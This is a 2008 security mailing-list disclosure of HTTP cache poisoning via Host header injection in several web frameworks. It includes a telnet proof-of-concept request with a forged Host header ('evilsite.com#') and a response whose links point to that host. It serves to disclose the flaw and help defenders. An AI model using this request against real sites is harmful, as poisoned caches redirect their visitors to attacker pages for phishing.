[Full-disclosure] HTTP cache poisoning via Host header injection



I've confirmed this in default installations of a few web frameworks
including Rails, Zope and WordPress.

The basic vulnerability comes when:

1) Your web server does not validate the Host header
2) Your code or your framework uses the Host header value to build links
3) You employ page or fragment caching

There may be phishing-type exploits possible even if a site does not
do 3), if there are caching proxies at the ISP level.

$ telnet www.example.com 80
Trying 1.2.3.4...
Connected to www.example.com.
Escape character is '^]'.
GET /foo/bar.html HTTP/1.1
User-Agent: Mozilla
Host: evilsite.com#

HTTP/1.1 200 OK
Date: Wed, 10 Jun 2008 00:27:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Wed, 17 Jun 2008 00:27:45 GMT
Content-Length: 2959
Content-Type: text/html; charset=iso-8859-1

<html>
<head>
<title>Foo : Bar</title>
</head>
<body>
<a href="http://evilsite.com#/";>Home</a>
<a href="http://evilsite.com#/about";>About</a>
<a href="http://evilsite.com#/login";>Login</a>

[...snip...]

<hr>
<address>Apache Server at evilsite.com# Port 80</address>
</body></html>


Some more details here:
http://carlos.bueno.org/2008/06/host-header-injection.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Re: By passing surf control
    ... Using telnet (in char mode) to connect a remote web server and doing so, ... It was even possible to fool Sc by crafting by hand a host header field ... with a permitted address while connecting a forbidden site, ...
    (Pen-Test)
  • Re: Please help me interpret a suspicious netstat SYN_SENT TCP port 1058 ?
    ... The web server at the above IP is using host header security. ... Windows NT 'Wininit.ini': ... reboot if the internet connection is alive on the wireless two-pc home ...
    (comp.security.firewalls)
  • RE: Question on Virtual Website definition
    ... This is a client browser behavior which isn't able to be controlled ... by web server. ... they will be real sites but not virtual directories. ... difference is everyone with its own host header. ...
    (microsoft.public.inetserver.iis)
  • Re: Would it be a DNS problem ?
    ... Would it be possible to give me some hints of Host Header as it is a ... What kind of Web server does it run on? ... I don't know about Apache web servers, but IIS host headers are set on the ... Web site tab>Advanced button of the virtual web site properties. ...
    (microsoft.public.windows.server.dns)
  • Please help with multiple domains on single IP/Host headers
    ... I have set up my web server and have 2 domains that I want on one IP. ... Domains are registered and parked at networksolutions, ... If I add the host header in the default site and nothing in the second site ...
    (microsoft.public.inetserver.iis)